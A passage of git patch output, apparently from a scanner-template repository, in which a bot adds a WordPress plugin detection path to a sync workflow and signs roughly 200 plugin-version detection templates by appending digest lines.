ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9923fa649026efc80e5922e143d578e3bbea683f +templates-checksum.txt:44107720d023cae03c471785fdd3645850f59330 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 604990adac86fb1557ed8c4caff16b22594cb0ea Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 03:34:23 +0000 Subject: [PATCH 213/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ff6f26f13c0..97b66ddad44 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' + - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From 78b75fd398da715239c5f41f26ea1e45ac1c6c1a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 03:35:23 +0000 Subject: [PATCH 214/247] Auto Template Signing [Tue Jul 16 03:35:23 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36401.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 334b162ac89..eb40bc63a5c 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749a..52a70bcd1f1 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c65b823d5ea99f97e8d18e798271d51bca4942510f098776ddcff1095fe1c23202203df76afb09f08b71d8337f4275bfbb3f707f23239683fd09af198548fd30b49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b632..414b8e1f463 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200da6585c66bc8846cd2f9ca26a91e682f5dcb45c5fd8b5d6482453765287a4fe022053773056083cc5deb2811182955c6db3db546c6a7013fa32395942582b868aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc80..3f9dd9c9f94 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b40b3c8bc7f6e73664404bece294910391a69ea90c9bda651d4ea4b1a6d44679022037b7ac6f050c4a6c7140b2b8e523a264db8d0bd46d6fbd269f5b525165c95862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2ed..e0efdbf0496 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b8e9474a66e9f53bb5f6511bbd2e0687db461ef22605c04c117b363823b97960221009b10b16219fe1ddca3d95535c1c5188f83491bbcfae9f61366c609dc6e09e4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f556..685bc73229f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c283c006f56d4531a17d038ece215b7bcbba1e802da341fe156482f5aed4cc3022009aea70e7c847f937da37422e056b8f6d2d977dc93fa1cf598d4d00badde65c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d042..96ae6393d11 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088ff73665cfd4c14c4bc8a41145346ba08df6fe5ca5132668978c8369536dbc0022100ef8f41ff0b297cd5eab55929696199dd414507a1863fa0509dd350c70b227cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f4469..23f5c0a784c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b65a492084c14ce7cb4558863c31965501d1f983924886b44df1e5c532aca090221009583ec10a3571aa6968cc28eb63206e0f29aa9f1ca2696c4af461ef67ae195c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e6..bce4c6c75a5 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079ad81fd618dd66f86b18703cb2c9d6e660cea83aa210bd6405b5dee2af11df502202a3e08b399df2ab88c31014dc9eb114415f8783b9cc8a6d71d6e313bec5d0029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e9..2956599a361 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f08486185fa1c664d9c3bd526c6a1134f25c0c690f7416d1d5f933ca9f9bedc02203469935a9fe2e20b0ccd414464ae42c606c0d0469c1000ae477b8ba37b50be39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1f..e11435ddc2a 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b62a173a79e9c39c665cbbfaa1c9cc5ce7203586bb9a7c74035eed740c4f420702206baafb39b911c2922bb1dfeb064e58a920973ead81221561619aab3f616238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd5..74d22f67e33 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079c392a31478d84f9b4bee3f964e4df5be78e88145c0178fe8dcc02ca2acebd0022039f528e9fc1e2dff2f32cc3e6249762429d5a84170628c3c21f7df335d989061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84c..7dd3eb88d51 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea65f24e64f20f1c706cef003345c9d44ac00e78f227a2a6a580173dd9e52647022100b1f27362e14c160715da13cc0cd2f8e0fa34ac6ed539be12848d67682a7ecf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2ce..42ca1cca2d1 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203719158333e1637929e373339820d1b8b03e40fec6d5eff273863b2cc35ce6a80220443148b554681622699f05609be51fab0b06d4cfacc095fbc80d6e5fa41ffd52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a944..29ac03b9306 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab24329151f03bdefc2ce80deb358f1305f08d8e999da427ecf3886b7e64153a02202d2f23e03e8c869d081097759bb4c69ef93e9ef5d1395c1a51305073b52c49eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dca..a9d979c0e5c 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da4fe179b9b4c7089b548fc06bbc015ce003b9d4b46ea1944bdb53897049fd7f0220059d856a2a8b31a5011801bc2c97901cb26bd2544285d3e60b58691523c7291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e5326941673..192d4fd0a9b 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc56b4d399e4a59e72e8553e014da111a93fc345649f0a2ef06a7ad1708a27ea022100d02d6c0466801c9c541bf03278bf00d29672447626f861c9a84d7e8e90545dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d6..5fb7ea9a3ca 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3a4711b824a1e1081d96ae167a1d55cb5a4256c641d3e112bc8694c76fd033602203ace72fd244107d02b17231f8192a9bcc37a63f07060f877481938340db0ac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c3..b277a430d37 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b841d61d2f86424b38c7a93e21c0038922a8c77ca63ca1f69bfb467c38765237022025341015f037bb29f036d00069a17e41dca06455f252d30cfc07785e77128a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a3..1177d38a77e 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e735b105ed63ee23722e5a4f8d18dba49f00cd6c563ab73ef5db7df693f015902203d20d751a8d889ebc7a6c8b8b89bb850cb08d188dc967ce51a46270e3daf3f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179ee..c122d1f0575 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8ec4a1f105712de7a2d8e9b5b3fe65f8946a6000626770d302d2b6f468a739302201a29d8088e8f333cbba876560db7f9079af738c529481cda13cbd8af2ddfee54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d139..6d0df5aaabb 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee90998c47458e2709b8acb4054512f9a82383bcf4dad743f01b9c3124c4c87c02201142a47b00bcc7df0321ae026493787a5390e19112fc30af34cdb0a60ff7095c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f6..a20ff68328c 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf5a03127cd3cc9563db65b0781e56931696dbd833caf2daab173172da9dd38a022100b6e0b9f929e4582b9c53f27d322c4e66ea96b29a341477c73fe9d768f6073a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924be..3759654c329 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b30dbdb69a0d3309dcceb706292aaca1f79ffc026931097293b3d2eb1bcaa6800220094f253b5bd2d73c7c93e85f16e4b6af3da84569af061356eb0d20244b77d80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a39..621761f13e6 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 